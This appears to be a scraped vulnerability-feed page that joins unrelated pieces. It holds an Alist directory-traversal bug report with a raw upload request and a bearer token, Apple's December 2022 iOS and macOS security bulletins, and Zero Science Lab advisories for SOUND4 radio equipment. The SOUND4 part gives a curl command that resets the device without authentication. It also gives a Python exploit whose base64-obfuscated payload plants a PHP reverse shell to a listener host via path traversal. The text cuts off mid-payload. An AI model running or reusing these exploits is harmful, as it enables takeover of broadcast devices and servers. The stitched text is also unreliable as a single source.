Alist v3.4.0 is vulnerable to Directory Traversal,

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0（It seems like this problem still exists in version 3.5.1）

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
    
*   I created a user 'test' with file upload permission only and set its base path to '/test'
    

*   My file directory structure is as follows

*   Login as 'test', found out that I am already in '/test'

*   And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

*   Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

**Reproduction / 复现链接**

Package:  
PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
Content-Length: 30530  
Accept: application/json, text/plain, _/_  
As-Task: false  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg\_-rzQ7hf5tbbsy4RSVc  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**  
Content-Type: application/octet-stream  
Origin: http://192.168.31.148:52000  
Referer: http://192.168.31.148:52000/  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close

�PNG  
�

**Logs / 日志**

CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

Released December 13, 2022

**AppleAVD**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AVEVideoEncoder**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**File System**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Graphics Driver**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**IOHIDFamily**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**iTunes Store**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

**ppp**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Safari**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.

Released December 13, 2022

**Accounts**

Available for: macOS Ventura

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AMD**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-42847: ABC Research s.r.o.

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**Bluetooth**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Boot Camp**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**DriverKit**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic (@antoniozekic)

**iTunes Store**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: macOS Ventura

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: macOS Ventura

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: macOS Ventura

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Ruby**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-24836

CVE-2022-29181

**Safari**

Available for: macOS Ventura

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

**xar**

Available for: macOS Ventura

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved checks.

CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

CVE-2022-46701: About the security content of macOS Ventura 13.1

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated factory reset vulnerability in restorefactory.cgi.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (restorefactory.cgi) Unauthenticated Factory ResetVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The device allows unauthenticated attackers to visit the unprotected/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factorydefault configuration. Once a POST request is made, the device will rebootwith its default settings allowing the attacker to bypass authenticationand take full control of the system.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5742Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php26.09.2022--> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \> sleep 120#login admin:admin

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Unauthenticated Factory Reset

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated remote code execution vulnerability in upload.cgi.

    #!/usr/bin/env python### SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution### Vendor: SOUND4 Ltd.# Product web page: https://www.sound4.com | https://www.sound4.biz# Affected version: FM/HD Radio Processing:#                   Impact/Pulse/First (Version 2: 1.1/2.15)#                   Impact/Pulse/First (Version 1: 2.1/1.69)#                   Impact/Pulse Eco 1.16#                   Voice Processing:#                   BigVoice4 1.2#                   BigVoice2 1.30#                   Web-Audio Streaming:#                   Stream 1.1/2.4.29#                   Watermarking:#                   WM2 (Kantar Media) 1.11## Summary: The SOUND4 IMPACT introduces an innovative process - mono and# stereo parts of the signal are processed separately to obtain perfect# consistency in terms of both sound and level. Therefore, in moving# reception, when the FM receiver switches from stereo to mono and back to# stereo, the sound variations and changes in level are reduced by over 90%.# In the SOUND4 IMPACT processing chain, the stereo expander can be used# substantially without any limitations.## With its advanced functionalities and impressive versatility, SOUND4# PULSE gives clients the ultimate price - performance ratio, providing# much more than just a processor. Flexible and powerful, it ensures perfect# sound quality and full compatibility with radio broadcasting standards# and can be used simultaneously for FM and HD, DAB, DRM or streaming.## SOUND4 FIRST provides all the most important functionalities you need# in an FM/HD processor and sets the bar high both in terms of performance# and affordability. Designed to deliver a sound of uncompromising quality,# this tool gives you 2-band processing, a digital stereo generator and an# IMPACT Clipper.## Desc: SOUND4 products suffer from an unauthenticated remote code execution# vulnerability. An attacker can exploit this vulnerability by abusing the# firmware upgrade/upload functionality, which contains a path traversal flaw.# This allows the attacker to arbitrarily write a malicious file to a location# on the system with www-data permissions, which can be executed to gain unauthorized# access.# ---------------------------------------------------------------------------# Starting handler on port 6161.# Writing callback file...# Connection from 192.168.1.137:58670# You got shell.# id# uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)# exit# *** Connection closed by remote host ***# ---------------------------------------------------------------------------## Tested on: Apache/2.4.25 (Unix)#            OpenSSL/1.0.2k#            PHP/7.1.1#            GNU/Linux 5.10.43 (armv7l)#            GNU/Linux 4.9.228 (armv7l)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5741# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php### 26.09.2022##import ipaddress as irukandji#--        -----------------------------from time import sleep#----------        ----------------------------import threading#-----------------        ---------------------------import telnetlib#------------------        --------------------------import requests#--------------------        -------------------------import socket#-----------------------        ------------------------import base64#------------------------        -----------------------import time#---------------------------        ----------------------import sys#-----------------------------        ---------------------import re#-------------------------------        --------------------importer  = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+        "SYWRpb1N0YXI6DQog"importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+        "KHNlbGYpOg0KICAg"importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+        "D0gIkRqL09sZSIN"importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+        "0gTm9uZQ0KICAg"importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+        "NCiAgICAgICAg"importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+        "gICAgc2VsZi5s"importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+        "VsZi5scG9ydCA9"importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+        "XJncyhzZWxmKToN"importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+        "cmd2KSAhPSA0Og0K"importer += "ICAgICAgICAgICAgc2VsZi50aGV"+        "fdXNhZ2UoKQ0KICAg"importer += "ICAgICBlbHNlOg0KICAgICAgIC"+        "AgICAgc2VsZi5yaG9z"importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+        "CAgICAgICAgICBzZWxm"importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+        "Ml0NCiAgICAgICAgICAg"importer += "IHNlbGYubHBvcnQgPSBpbnQ"+        "oc3lzLmFyZ3ZbM10pDQog"importer += "ICAgICAgICAgICBpZiBub3"+        "QgImh0dHAiIGluIHNlbGYu"importer += "cmhvc3Q6DQogICAgICAgI"+        "CAgICAgICAgc2VsZi5yaG9z"importer += "dCA9ICJodHRwOi8ve30i"+        "LmZvcm1hdChzZWxmLnJob3N0"importer += "KQ0KDQogICAgZGVmIHR"+        "oZV91c2FnZShzZWxmKToNCiAg"importer += "ICAgICAgc2VsZi50aG"+        "Vfd2hhKCkNCiAgICAgICAgcHJp"importer += "bnQoIlVzYWdlOiBwe"+        "XRob24ge30gW3RhcmdldElQOnRh"importer += "cmdldFBPUlRdIFts"+        "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"importer += "Ii5mb3JtYXQoc3l"+        "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"importer += "eGl0KDApDQoNCi"+        "AgICBkZWYgdGhlX3doYShzZWxmKToN"importer += "CiAgICAgICAgd"+        "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"importer += "X19fX18gIF9f"+        "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"importer += "X19uDQogICA"+        "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"importer += "CiAgICAgIC"+        "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"importer += "ICAgIDBcL"+        "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"importer += "IFwuX19f"+        "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"importer += "eF9fX18"+        "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"importer += "ICxeLi"+        "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"importer += "IGBpD"+        "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"importer += "CiAg"+        "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"importer += "ICAg"+        "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"importer += "L18vI"+        "CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"importer += "ICAgIC"+        "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"importer += "fn5+fn5"+        "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"importer += "IiIiDQog"+        "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"importer += "ZWYgdGhl"+        "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"importer += "bnQoIldy"+        "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"importer += "ICAgICAg"+        "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"importer += "eXBlIiA6"+         "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"importer += "uZGFyeT0"+          "tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"importer += "CAgICAgI"+            "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"importer += "iA6ICJlb"+              "i1VUyxlbjtxPTAuOSIsDQogICAgICA"importer += "gICAgICA"+                "gICAgICAgICAgICAiQWNjZXB0LUV"importer += "uY29kaW5"+                  "nIiA6ICJnemlwLCBkZWZsYXRlI"importer += "iwNCiAgI"+                    "CAgICAgICAgICAgICAgICAgI"importer += "CAgICJVc"+                      "2VyLUFnZW50IiA6IHNlbGY"importer += "uc2VjcmV"+                        "0YWdlbnQsDQogICAgICA"importer += "gICAgICAg"+                       "ICAgICAgICAgICAiQ2Fj"importer += "aGUtQ29udH"+                      "JvbCIgOiAibWF4LWFnZT"importer += "0wIiwgDQogI"+                     "CAgICAgICAgICAgICAgI"importer += "CAgICAgICAiQ2"+                   "9ubmVjdGlvbiIgOiAiY2"importer += "xvc2UiLA0KICAgI"+                 "CAgICAgICAgICAgICAgI"importer += "CAgICAgIkFjY2VwdC"+               "IgOiAiKi8qIn0NCiAgIC"importer += "ANCiAgICAgICAgc2VsZ"+             "i5wYXlsb2FkID0gIjw/c"importer += "GhwIGV4ZWMoXCIvYmluL2"+          "Jhc2ggLWMgJ2Jhc2ggLWk"importer += "gPiAvZGV2L3RjcC8iK3Nlb"+        "GYubGhvc3QrIi8iK3N0cih"importer += "zZWxmLmxwb3J0KSsiIDwmM"+        "TtybSBiLnBocCdcIik7Ig0"importer += "KDQogICAgICAgIHNlbGYuZ"+        "GVwbG95ICA9ICItLS0tLS1"importer += "UaGVNZW51XHJcbkNvbnRlbn"+        "QtRGlzcG9zaXRpb246IGZ"importer += "vcm0tZGF0YTsiI3VzDQogICA"+        "gICAgIHNlbGYuZGVwbG9"importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+        "bGVcIjsgZmlsZW5hbWU"importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+        "i8iI01lDQogICAgICA"importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+        "92YXIvd3d3L2IucGh"importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+        "hcHBsaWNhdGlvbi8"importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+        "bG95ICs9ICJvY3R"importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+        "i5wYXlsb2FkKyJ"importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+        "AgIHNlbGYuZGV"importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+        "0LURpc3Bvc2l"importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+        "I24NCiAgICA"importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+        "FwiXHJcblx"importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+        "1cclxuIiM"importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+        "zdHMucG9"importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+        "YWQuY2d"importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+        "GE9c2V"importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+        "ANCiA"importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+        "rIi9"importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+        "Zik"importer += "6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+        "mV"importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+        "F"importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+        "A"importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+        "9"importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+        "iA"importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+        "bmV"importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+        "hbmR"importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+        "xwb3J"importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+        "XQoc29"importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+        "UkVBTSk"importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+        "sIHNlbGY"importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+        "VlOg0KICA"importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+        "CAgICAgIHM"importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+        "ICAgICAgIHM"importer += 